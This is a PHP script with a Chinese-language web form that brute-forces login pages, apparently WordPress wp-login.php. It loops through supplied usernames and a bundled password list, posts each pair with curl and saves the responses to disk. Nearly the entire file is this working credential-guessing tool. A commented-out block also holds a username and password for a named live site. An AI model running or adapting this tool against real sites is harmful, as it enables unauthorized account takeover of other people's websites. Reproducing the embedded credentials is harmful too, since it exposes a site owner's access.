<?php 
/*
$url = "http://www.wuloonming.com/wp-login.php";
$params = array(
		"log"=>"admin",
		"pwd"=>"gV6BCyBzs",
		"rememberme"=>"forever",
		"wp-submit"=>"Log In",
		"redirect_to"=>"http://www.wpy.wuloonming.com/wp-admin/",
		"testcookie"=>"1",
	);
*/
if($_SERVER['REQUEST_METHOD'] == "POST"){
	include_once 'function/Include.php';
	$url = trim($_POST["url"]);
	$user_name = trim($_POST["user_name"]);
	$params = trim($_POST["params"]);
	
	write_log("url:$url");
	write_log("params:$params");
	
	$users = explode(",", $user_name);//将用户名以","号分开
	$passwords = include 'function/password.php';//取得密码
	foreach ($users as $user) {//循环用户名
		$user = trim($user);
		if(empty($user)){
			echo "<h1 class=red>用户名不对</h1>";
			break;
		}
		foreach ($passwords as $pwd) {//循环密码
			if(empty($pwd))
				continue;
			
			//每次请求的用户名和密码都不同,所以在请求前要替换
			$post_params = str_replace("[USER_NAME]", $user, $params);
			$post_params = str_replace("[PASSWORD]", $pwd, $post_params);
			$return_str = curl($url,$post_params);
			if(strpos($return_str, "Invalid username") !== false || strpos($return_str, "用户不存在") !== false)
				break;
			
			//下面是保存返回的结果
			$result = "url:".$url."\r\n".json_encode($post_params)."\r\n\r\n".$return_str;
			$file_name = "data/".time_auto(8,true).".html";
			saveFile($result, $file_name);
		}
		
	}
	$status = "好了，到后台，data文件夹下查看吧";
}else{
	$url = "http://192.168.1.57/function/update/sql_test.php";
	$user_name = "admin";
	$params = "log=[USER_NAME]&pwd=[PASSWORD]&rememberme=forever&wp-submit=Log In&redirect_to=http://www.viasalzburg.com/wp-admin/&testcookie=1";
	$status = "点击开始";
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
	<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
	<meta http-equiv="Content-Language" content="zh-CN" />
	<title></title>
	<script src="js_css/jquery-1.4.2.min.js" type="text/javascript"></script>
	<link rel="stylesheet" href="js_css/style.css" type="text/css" media="screen" />
</head>
<body>
<h1>我的中国心</h1>
<h3><?php echo $status?></h3>
<form action="" method="post">
	<p>
		<label for="user_login">Url<br/>
		<input type="text" name="url" value="<?php echo $url?>" size="100"/></label>
		<br/>
		<span class="note">注:登录的地址,在form中的action中</span>
	</p>
	<p>
		<label for="user_name">用户名<br/>
		<input type="text" name="user_name" value="<?php echo $user_name?>" size="100"/></label>
		<br/>
		<span class="note">注:中间以","分隔</span>
	</p>
	<p>
		<label for="user_pass">参数<br />
		<textarea tabindex="6" rows="8" cols="100" name="params"><?php echo $params;?></textarea></label>
		<br/>
		<span class="note">注:log=[ADMIN]&pwd=[PASSWORD] ,是post提交的参数</span>
		<br/>
		<span class="note">[ADMIN]和[PASSWORD]是程序运行时要替换的值,可以在后面继续"&a1=value"</span>
	</p>
	<p class="submit">
		<input type="submit" class="button-primary" value="开始吧>>"/>
	</p>
</form>

</body>
</html>